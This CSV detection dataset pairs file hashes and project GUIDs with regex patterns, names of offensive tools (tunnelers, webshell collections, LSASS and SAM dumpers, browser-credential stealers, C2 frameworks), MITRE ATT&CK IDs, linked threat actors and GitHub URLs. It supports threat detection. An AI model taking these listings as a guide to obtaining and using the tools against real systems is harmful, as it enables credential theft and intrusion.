"*1587d5a67e91ff3f4b00b409066305ddad3796be41945de2a486b311b9425b97*",".{0,1000}1587d5a67e91ff3f4b00b409066305ddad3796be41945de2a486b311b9425b97.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22264" "*158b4c36722770abd1f8732a19fd32a61d7892dc0fde6ab220adfacaff5628e8*",".{0,1000}158b4c36722770abd1f8732a19fd32a61d7892dc0fde6ab220adfacaff5628e8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22265" "*158c0b33376d319848cffd69f20dc6e2dc93aa66ed71dffd6f0ee3803da70dd2*",".{0,1000}158c0b33376d319848cffd69f20dc6e2dc93aa66ed71dffd6f0ee3803da70dd2.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - 
T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","0","#filehash","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","22266" "*1594d2cb2fc051ab4dd77d0f6ec318f25f1430af50fdef934e3e996fbb91d42f*",".{0,1000}1594d2cb2fc051ab4dd77d0f6ec318f25f1430af50fdef934e3e996fbb91d42f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22268" "*159766fade72711fc8b28004ec1f2088bb837852029f1e79446d728728c235ef*",".{0,1000}159766fade72711fc8b28004ec1f2088bb837852029f1e79446d728728c235ef.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","#filehash","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","22270" "*15a1788abea29f55f817e7b9e19fe006fbfac0d5b6ff038b638c4a51f4e08d47*",".{0,1000}15a1788abea29f55f817e7b9e19fe006fbfac0d5b6ff038b638c4a51f4e08d47.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22271" "*15a2171b1424a78028131808a24d39d5f5383cfd4540ea360a74f9b7c752933d*",".{0,1000}15a2171b1424a78028131808a24d39d5f5383cfd4540ea360a74f9b7c752933d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","22272" "*15a22b4600d84490ed569c288896a53aa802a0ed466c8802debde5857fa20881*",".{0,1000}15a22b4600d84490ed569c288896a53aa802a0ed466c8802debde5857fa20881.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22273" "*15ac2ce4714d343601fd09ceb2182f887d094e7311135bddf50b7059c1ab4a9f*",".{0,1000}15ac2ce4714d343601fd09ceb2182f887d094e7311135bddf50b7059c1ab4a9f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22274" "*15b508d7f36e8f43dd0a0c5f1dc63d120c0cdbe68cd18247d6ca18a9ce6cf807*",".{0,1000}15b508d7f36e8f43dd0a0c5f1dc63d120c0cdbe68cd18247d6ca18a9ce6cf807.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22276" "*15bc39581933d59dcdb7a264d149cf9bec398e04d18ab0b52f596861614c37b3*",".{0,1000}15bc39581933d59dcdb7a264d149cf9bec398e04d18ab0b52f596861614c37b3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22277" "*15bca0052f87e43a6545f34c7f5052853316f6b7f2c178624313b3e1e24c0655*",".{0,1000}15bca0052f87e43a6545f34c7f5052853316f6b7f2c178624313b3e1e24c0655.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22278" "*15bcc98e54e18078130e5d5e21e2d76a31cf3b06fc9e1d0113878d7645cfcd23*",".{0,1000}15bcc98e54e18078130e5d5e21e2d76a31cf3b06fc9e1d0113878d7645cfcd23.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22279" "*15bdbbebff7a58257d1cd0ade5d76877259c2b3152508f1b2534a6fcab89cb38*",".{0,1000}15bdbbebff7a58257d1cd0ade5d76877259c2b3152508f1b2534a6fcab89cb38.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","#filehash","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","22280" "*15c8924d9a1c039c2afaf54c431cda1aa0afd3a2dcf67d88d9cafc3ec89cc21b*",".{0,1000}15c8924d9a1c039c2afaf54c431cda1aa0afd3a2dcf67d88d9cafc3ec89cc21b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","22283" "*15cb2dd2018c7d8d79752c3165c95ee8e42d70aac398d11dc41e236cbf997595*",".{0,1000}15cb2dd2018c7d8d79752c3165c95ee8e42d70aac398d11dc41e236cbf997595.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22284" "*15ce9a3c-4609-4184-87b2-e29fc5e2b770*",".{0,1000}15ce9a3c\-4609\-4184\-87b2\-e29fc5e2b770.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","#GUIDproject","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","22285" "*15d2be7e3c1c5edec59861a2989f2d1df2f77a12d75eedfa997bec5a779f4c39*",".{0,1000}15d2be7e3c1c5edec59861a2989f2d1df2f77a12d75eedfa997bec5a779f4c39.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22286" "*15e6c7dff42fb507621fddbcbf786ca0022e85ceb431685f607e3d5e07901faa*",".{0,1000}15e6c7dff42fb507621fddbcbf786ca0022e85ceb431685f607e3d5e07901faa.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22288" 
"*15fc3df52f81c0f09a430e52a2612d1a999284eeb802c8cec48d135fc3b46414*",".{0,1000}15fc3df52f81c0f09a430e52a2612d1a999284eeb802c8cec48d135fc3b46414.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22291" "*1605d453-7d62-4198-a436-27e48ef828eb*",".{0,1000}1605d453\-7d62\-4198\-a436\-27e48ef828eb.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#GUIDproject","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","22292" "*16091e51ca4fcdf374a839ff3b850638918915b5d04c032fffec402286daf4cb*",".{0,1000}16091e51ca4fcdf374a839ff3b850638918915b5d04c032fffec402286daf4cb.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","22294" "*1610107593861f211a6dc6e886cd8a4ec67bef2ede1072195746462ecb79babd*",".{0,1000}1610107593861f211a6dc6e886cd8a4ec67bef2ede1072195746462ecb79babd.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories 
for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","22296" "*161451349be662c5c649be01c670f86b233fb08a1c77c9b720ea08b622d04964*",".{0,1000}161451349be662c5c649be01c670f86b233fb08a1c77c9b720ea08b622d04964.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","22297" "*1615016050f681f61f692ef54d34a26911587fff98fa6ee1f945f1ecd04e2705*",".{0,1000}1615016050f681f61f692ef54d34a26911587fff98fa6ee1f945f1ecd04e2705.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","#filehash #linux","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","22298" "*1616ff243a9688f6a5e9bbc73f428ab61d2ab17c9b0c05e92cee43c0589b8315*",".{0,1000}1616ff243a9688f6a5e9bbc73f428ab61d2ab17c9b0c05e92cee43c0589b8315.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22300" 
"*1617117C-0E94-4E6A-922C-836D616EC1F5*",".{0,1000}1617117C\-0E94\-4E6A\-922C\-836D616EC1F5.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","#GUIDproject","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","22301" "*1617cf34f5dd98fd31a4c49f522bff51e951a21db40a46f3e7b750f9b600c4e5*",".{0,1000}1617cf34f5dd98fd31a4c49f522bff51e951a21db40a46f3e7b750f9b600c4e5.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","22302" "*161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6*",".{0,1000}161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22303" "*162bc32dbc28b62c3a6bcaa33b83f4a99ca60453b229d35d0ae5bc1e80b98673*",".{0,1000}162bc32dbc28b62c3a6bcaa33b83f4a99ca60453b229d35d0ae5bc1e80b98673.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential 
Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","22306" "*1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944*",".{0,1000}1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","22308" "*16323ccc9d39811ba9388ec8121d47246139d82658b85e7a090da15e4cf8bd1b*",".{0,1000}16323ccc9d39811ba9388ec8121d47246139d82658b85e7a090da15e4cf8bd1b.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22309" "*16337f81bede48a56cba8329bfe3cf02153c96d1e3650112ecdb03f58b25b17d*",".{0,1000}16337f81bede48a56cba8329bfe3cf02153c96d1e3650112ecdb03f58b25b17d.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","22310" 
"*16351c63e40c416d311b478ca4442d92fa7a74265ca58332b2a19b0568fb7479*",".{0,1000}16351c63e40c416d311b478ca4442d92fa7a74265ca58332b2a19b0568fb7479.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","22311" "*163599fee9456a8e2af271824da6e39cfd6aceabb7a62961b8c1a911b94725d6*",".{0,1000}163599fee9456a8e2af271824da6e39cfd6aceabb7a62961b8c1a911b94725d6.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","22312" "*1636247156ec4ac898c680d8b7897c84153f27ef468e6084229fb86f13cbc598*",".{0,1000}1636247156ec4ac898c680d8b7897c84153f27ef468e6084229fb86f13cbc598.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","22313" "*1637c5d66df6ce383aee2ab51e305ae9b654cfb4ceb21cf09d5123a54d7d7b7d*",".{0,1000}1637c5d66df6ce383aee2ab51e305ae9b654cfb4ceb21cf09d5123a54d7d7b7d.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","#filehash","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","22315" "*16386980a156fc6e9219ba230c5fd2759e4b43dff9261487598e7d0ecfe78ae0*",".{0,1000}16386980a156fc6e9219ba230c5fd2759e4b43dff9261487598e7d0ecfe78ae0.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#filehash","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","22316" "*1642e74e1c5dfd2863c2100b241e1f4897180a5aba2dd7313060c7953b24f105*",".{0,1000}1642e74e1c5dfd2863c2100b241e1f4897180a5aba2dd7313060c7953b24f105.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","22318" "*164425759daa52e1a44001421120e2f616f08614239f5231be763061c6e56892*",".{0,1000}164425759daa52e1a44001421120e2f616f08614239f5231be763061c6e56892.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22321" "*16461494c864ffe95bb32a01a8db0aa7d46e9db9d6fa0546fdaf75044eb299fa*",".{0,1000}16461494c864ffe95bb32a01a8db0aa7d46e9db9d6fa0546fdaf75044eb299fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22323" "*1647b6e9073cee9751e3cd9a031656a6b830355a7a87d15cdc18601ddfa2f327*",".{0,1000}1647b6e9073cee9751e3cd9a031656a6b830355a7a87d15cdc18601ddfa2f327.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","22324" "*1651b1dcc9a0a8b4cadc099992771c12ddfaadba0007a80d4c501f63890f0d9a*",".{0,1000}1651b1dcc9a0a8b4cadc099992771c12ddfaadba0007a80d4c501f63890f0d9a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22325" "*1659E645-27B0-4AB9-A10E-64BA4B801CB0*",".{0,1000}1659E645\-27B0\-4AB9\-A10E\-64BA4B801CB0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - 
TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","22327" "*165a010438ef6f3b9d8dfbb47e486740e5d8235e77d28efb7b7c1b93654f71b4*",".{0,1000}165a010438ef6f3b9d8dfbb47e486740e5d8235e77d28efb7b7c1b93654f71b4.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","0","#filehash","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","22328" "*165cae982b674e1893b733f94c084775ba4881dca16d726c480f924435c70de9*",".{0,1000}165cae982b674e1893b733f94c084775ba4881dca16d726c480f924435c70de9.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22329" "*165fdaffa2c622e15a709fc597e03c5b8ca2a627cfad12375c81ac65a5c5ad11*",".{0,1000}165fdaffa2c622e15a709fc597e03c5b8ca2a627cfad12375c81ac65a5c5ad11.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22330" "*166bc58e721deee406eb5b85e40e6201745d6a7379d862d8a202485ab7295dd5*",".{0,1000}166bc58e721deee406eb5b85e40e6201745d6a7379d862d8a202485ab7295dd5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by 
famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22333" "*16717cf09d49d252b21c5768092a557ea5a7899d781656da909a7766b6c55074*",".{0,1000}16717cf09d49d252b21c5768092a557ea5a7899d781656da909a7766b6c55074.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#filehash","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","22334" "*1676f2761aadc0b59145f87fce45d8f27339d8978d015245cbc1c5cfa8c38eda*",".{0,1000}1676f2761aadc0b59145f87fce45d8f27339d8978d015245cbc1c5cfa8c38eda.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22335" "*167b3dcac59b80e1a0084a8c5aceadc8df796ae35e4fa2dc7c5b7e8eccc22f24*",".{0,1000}167b3dcac59b80e1a0084a8c5aceadc8df796ae35e4fa2dc7c5b7e8eccc22f24.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
